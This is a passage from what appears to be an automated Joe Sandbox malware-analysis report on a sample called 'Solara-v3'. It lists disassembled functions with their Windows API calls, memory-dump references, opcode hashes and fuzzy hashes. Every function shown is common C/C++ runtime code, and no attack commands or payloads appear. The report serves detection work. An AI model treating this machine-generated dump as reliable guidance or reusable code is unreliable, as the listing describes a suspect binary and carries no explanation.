                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033120728.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033137824.0000000000CD2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033168531.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_c90000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3852720340-0
                                                                                                                                                                                                                                              • Opcode ID: 935061f7002de1ec0235510009eba57e7c503ddd2b989131a0160a2b31a8ffaf
                                                                                                                                                                                                                                              • Instruction ID: 807ea783ca2d7325a7fff08239e9faf3fcbeb9733c108e65d62ed925ddd9eb25
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 935061f7002de1ec0235510009eba57e7c503ddd2b989131a0160a2b31a8ffaf
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8C01A0326157175EA72417F5FC46F6E2698E703B7DB24033AF560555F0EF624C02E641
                                                                                                                                                                                                                                              Function 00CAB56E Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 301COMMONLIBRARYCODE
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • type_info::operator==.LIBVCRUNTIME ref: 00CAB68D
                                                                                                                                                                                                                                              • CallUnexpected.LIBVCRUNTIME ref: 00CAB906
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2033044910.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033030136.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033068489.0000000000CBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033085518.0000000000CCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033099686.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033120728.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033137824.0000000000CD2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033168531.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_c90000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CallUnexpectedtype_info::operator==
                                                                                                                                                                                                                                              • String ID: csm$csm$csm
                                                                                                                                                                                                                                              • API String ID: 2673424686-393685449
                                                                                                                                                                                                                                              • Opcode ID: 6cd9fcfec676311d0f07537f2c1dcec012c4349e264e22249b0f1c1a18ff9679
                                                                                                                                                                                                                                              • Instruction ID: f22d2c79a3326b57d1c3ab4d136db52a1eae5c052a6927cee439a7d94e603bff
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6cd9fcfec676311d0f07537f2c1dcec012c4349e264e22249b0f1c1a18ff9679
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 37B15A7180020AEFCF18DFA5C8819AEB7B9FF06318F14455AF8216B252D736DE51EB91
                                                                                                                                                                                                                                              Function 00C9BE95 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • std::_Ref_count_base::_Decref.LIBCPMT ref: 00C9BF44
                                                                                                                                                                                                                                              • std::_Ref_count_base::_Decref.LIBCPMT ref: 00C9C028
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2033044910.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033030136.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033068489.0000000000CBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033085518.0000000000CCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033099686.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033120728.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033137824.0000000000CD2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033168531.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_c90000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: DecrefRef_count_base::_std::_
                                                                                                                                                                                                                                              • String ID: MOC$RCC$csm
                                                                                                                                                                                                                                              • API String ID: 1456557076-2671469338
                                                                                                                                                                                                                                              • Opcode ID: b7f0c12a10aa9fb59450fe93a7c7b38a33d6b04898abe660bb72f39d3ee1b771
                                                                                                                                                                                                                                              • Instruction ID: 1b215253950c5c51c81674f35c47db4e2ab0e66fe46735ffa08d4d3d1a628ee4
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b7f0c12a10aa9fb59450fe93a7c7b38a33d6b04898abe660bb72f39d3ee1b771
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8F41AF78900205EFCF28DFA8EA499ADB7B5BF48300B58805DE459A7651C734EF44DB51
                                                                                                                                                                                                                                              Function 00CA55C4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,3F29B6ED,?,?,00000000,00CBBE94,000000FF,?,00CA5685,00000002,?,00CA5721,00CA8396), ref: 00CA55F9
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00CA560B
                                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000,?,?,00000000,00CBBE94,000000FF,?,00CA5685,00000002,?,00CA5721,00CA8396), ref: 00CA562D
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2033044910.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033030136.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033068489.0000000000CBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033085518.0000000000CCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033099686.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033120728.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033137824.0000000000CD2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033168531.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_c90000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                              • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                              • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                              • Opcode ID: b71069e5a27409519b7d6d13d384d05e580ec18669b16d65ae3979fb821712ff
                                                                                                                                                                                                                                              • Instruction ID: 04e45b4562e0ac766fcaa26d2a52093142dd0bcf43f396b4022f2a031f90f00f
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b71069e5a27409519b7d6d13d384d05e580ec18669b16d65ae3979fb821712ff
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 39018631A40659AFDB118F54DD09FEEB7B8FB05B15F004529F821A22A0DB759E00CA90
                                                                                                                                                                                                                                              Function 00CAD6EA Relevance: 7.7, APIs: 5, Instructions: 197COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • __alloca_probe_16.LIBCMT ref: 00CAD76F
                                                                                                                                                                                                                                              • __alloca_probe_16.LIBCMT ref: 00CAD838
                                                                                                                                                                                                                                              • __freea.LIBCMT ref: 00CAD89F
                                                                                                                                                                                                                                                • Part of subcall function 00CABF11: RtlAllocateHeap.NTDLL(00000000,00CADF35,?,?,00CADF35,00000220,?,00000000,?), ref: 00CABF43
                                                                                                                                                                                                                                              • __freea.LIBCMT ref: 00CAD8B2
                                                                                                                                                                                                                                              • __freea.LIBCMT ref: 00CAD8BF
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2033044910.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033030136.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033068489.0000000000CBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033085518.0000000000CCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033099686.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033120728.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033137824.0000000000CD2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033168531.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_c90000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: __freea$__alloca_probe_16$AllocateHeap
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1423051803-0
                                                                                                                                                                                                                                              • Opcode ID: a6bb72f5d1e46674599f41e4e8fff60717aa401b5001ba503bd6399f757f6043
                                                                                                                                                                                                                                              • Instruction ID: 7388c92329f8f2e89e58155c54f68ed76504ee94ec4d8dc3f7fc9a5945ae50b2
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a6bb72f5d1e46674599f41e4e8fff60717aa401b5001ba503bd6399f757f6043
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: EE51A172600207AFEB259F618C85EBF3AA9EF46718B190128FD17D6591E734CD50D6A0
                                                                                                                                                                                                                                              Function 00C9EFF1 Relevance: 7.6, APIs: 5, Instructions: 116threadCOMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 00C9F005
                                                                                                                                                                                                                                              • AcquireSRWLockExclusive.KERNEL32(00C98E38), ref: 00C9F024
                                                                                                                                                                                                                                              • AcquireSRWLockExclusive.KERNEL32(00C98E38,00C9A2F0,?), ref: 00C9F052
                                                                                                                                                                                                                                              • TryAcquireSRWLockExclusive.KERNEL32(00C98E38,00C9A2F0,?), ref: 00C9F0AD
                                                                                                                                                                                                                                              • TryAcquireSRWLockExclusive.KERNEL32(00C98E38,00C9A2F0,?), ref: 00C9F0C4
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2033044910.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033030136.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033068489.0000000000CBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033085518.0000000000CCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033099686.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033120728.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033137824.0000000000CD2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033168531.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_c90000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: AcquireExclusiveLock$CurrentThread
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 66001078-0
                                                                                                                                                                                                                                              • Opcode ID: 1b13980c7361f5676c9baf0c37f708146283441ab5f859f06d62946f93a014d2
                                                                                                                                                                                                                                              • Instruction ID: 7cb60469e60d3eba02824e52c9b2719e854e56e246de6bea652ef82c6105916e
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1b13980c7361f5676c9baf0c37f708146283441ab5f859f06d62946f93a014d2
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2741587160060ADBCF20CF65C989AAEB7F8FF04311B20593EE466C7542D730EA86DB91
                                                                                                                                                                                                                                              Function 00C93C70 Relevance: 7.6, APIs: 5, Instructions: 111COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 00C93CA5
                                                                                                                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 00C93CBF
                                                                                                                                                                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 00C93CE0
                                                                                                                                                                                                                                              • __Getctype.LIBCPMT ref: 00C93D92
                                                                                                                                                                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 00C93DD8
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2033044910.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033030136.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033068489.0000000000CBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033085518.0000000000CCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033099686.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033120728.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033137824.0000000000CD2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033168531.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_c90000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Lockitstd::_$Lockit::_Lockit::~_$Getctype
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3087743877-0
                                                                                                                                                                                                                                              • Opcode ID: 59fd7775d9f215b5e043b60a88d400264f0c945916757060a7ac657fa37791b9
                                                                                                                                                                                                                                              • Instruction ID: b1e6b096cebeb2add7d7cb4ddc9487e84cfd50b24113dc315e5fe30dafd249ef
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 59fd7775d9f215b5e043b60a88d400264f0c945916757060a7ac657fa37791b9
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: EF4136B2E002588FCF14DF94D858BAEB7B1FB48724F158219D8296B391DB34AE41CF91
                                                                                                                                                                                                                                              Function 00C9D4C2 Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • __EH_prolog3.LIBCMT ref: 00C9D4C9
                                                                                                                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 00C9D4D3
                                                                                                                                                                                                                                              • int.LIBCPMT ref: 00C9D4EA
                                                                                                                                                                                                                                                • Part of subcall function 00C9C1E5: std::_Lockit::_Lockit.LIBCPMT ref: 00C9C1F6
                                                                                                                                                                                                                                                • Part of subcall function 00C9C1E5: std::_Lockit::~_Lockit.LIBCPMT ref: 00C9C210
                                                                                                                                                                                                                                              • codecvt.LIBCPMT ref: 00C9D50D
                                                                                                                                                                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 00C9D544
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2033044910.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033030136.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033068489.0000000000CBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033085518.0000000000CCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033099686.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033120728.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033137824.0000000000CD2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033168531.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_c90000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3codecvt
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3716348337-0
                                                                                                                                                                                                                                              • Opcode ID: 2f3c688d904739fdc24ed71108a9fc53b7379734c3320af4deb2afc729a31d70
                                                                                                                                                                                                                                              • Instruction ID: 32339ddc927fb1342d4d5e8b189261eb2aff3d7a84eef0effa841250f0d50a63
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2f3c688d904739fdc24ed71108a9fc53b7379734c3320af4deb2afc729a31d70
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6F01C4719002158FCF01EBA4C949BAE7771AF84724F150009E426AB291CF34DE41EB81
                                                                                                                                                                                                                                              Function 00C9ADD7 Relevance: 7.5, APIs: 5, Instructions: 44COMMONLIBRARYCODE
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • __EH_prolog3.LIBCMT ref: 00C9ADDE
                                                                                                                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 00C9ADE9
                                                                                                                                                                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 00C9AE57
                                                                                                                                                                                                                                                • Part of subcall function 00C9ACAA: std::locale::_Locimp::_Locimp.LIBCPMT ref: 00C9ACC2
                                                                                                                                                                                                                                              • std::locale::_Setgloballocale.LIBCPMT ref: 00C9AE04
                                                                                                                                                                                                                                              • _Yarn.LIBCPMT ref: 00C9AE1A
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2033044910.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033030136.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033068489.0000000000CBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033085518.0000000000CCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033099686.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033120728.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033137824.0000000000CD2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033168531.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_c90000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1088826258-0
                                                                                                                                                                                                                                              • Opcode ID: a9c35d62559c63c5260b3881924edc20e194a9bec2df68adaeb0fdf1f8df58d2
                                                                                                                                                                                                                                              • Instruction ID: 0169a4fbfd961b30d26cdc201735149d79477b7a5762b6a601f5368f2910be2f
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a9c35d62559c63c5260b3881924edc20e194a9bec2df68adaeb0fdf1f8df58d2
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CD017875A002609BCF06EB20D999B7D7B61FF88750B154059E8169B391CF39AE42EBC2
                                                                                                                                                                                                                                              Function 00C9B755 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 73COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • std::_Ref_count_base::_Decref.LIBCPMT ref: 00C9B809
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2033044910.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033030136.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033068489.0000000000CBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033085518.0000000000CCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033099686.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033120728.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033137824.0000000000CD2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033168531.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_c90000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: DecrefRef_count_base::_std::_
                                                                                                                                                                                                                                              • String ID: MOC$RCC$csm
                                                                                                                                                                                                                                              • API String ID: 1456557076-2671469338
                                                                                                                                                                                                                                              • Opcode ID: 238d5308a5a164cab1b56eadbfdf40bc917b4e14d40608c4056c13fedb456114
                                                                                                                                                                                                                                              • Instruction ID: 18fa9d96c0b030266ef7c04d39e6e8cf081da70a01b48637136064ea45a3acb7
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 238d5308a5a164cab1b56eadbfdf40bc917b4e14d40608c4056c13fedb456114
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E021F535800605FFCF249F94E65AB79B7ACEF84760F14461DE4218B6D1DB34AF40CA90
                                                                                                                                                                                                                                              Function 00CB6940 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00CB69DC,00000000,?,00CCD2B0,?,?,?,00CB6913,00000004,InitializeCriticalSectionEx,00CC0D34,00CC0D3C), ref: 00CB694D
                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00CB69DC,00000000,?,00CCD2B0,?,?,?,00CB6913,00000004,InitializeCriticalSectionEx,00CC0D34,00CC0D3C,00000000,?,00CABBBC), ref: 00CB6957
                                                                                                                                                                                                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 00CB697F
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2033044910.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033030136.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033068489.0000000000CBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033085518.0000000000CCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033099686.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033120728.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033137824.0000000000CD2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033168531.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_c90000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                                                              • String ID: api-ms-
                                                                                                                                                                                                                                              • API String ID: 3177248105-2084034818
                                                                                                                                                                                                                                              • Opcode ID: a2a11a4c7a45d48da7f3ff96574ac33ec8b5cfcc4cc4f264c0fd36bed022cdc5
                                                                                                                                                                                                                                              • Instruction ID: 3b76fd67d7a7efae9e2e21f5bfbf1f2ab42eec6f2caf24b4e021fdf58b2c5e19
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a2a11a4c7a45d48da7f3ff96574ac33ec8b5cfcc4cc4f264c0fd36bed022cdc5
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B4E01A30780204BAEF201BA0ED06FAD3A55AB40B92F140420FA4DE89E0DB75ED949944
                                                                                                                                                                                                                                              Function 00CB3F9E Relevance: 6.3, APIs: 4, Instructions: 333fileCOMMONLIBRARYCODE
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetConsoleOutputCP.KERNEL32(3F29B6ED,00000000,00000000,?), ref: 00CB4001
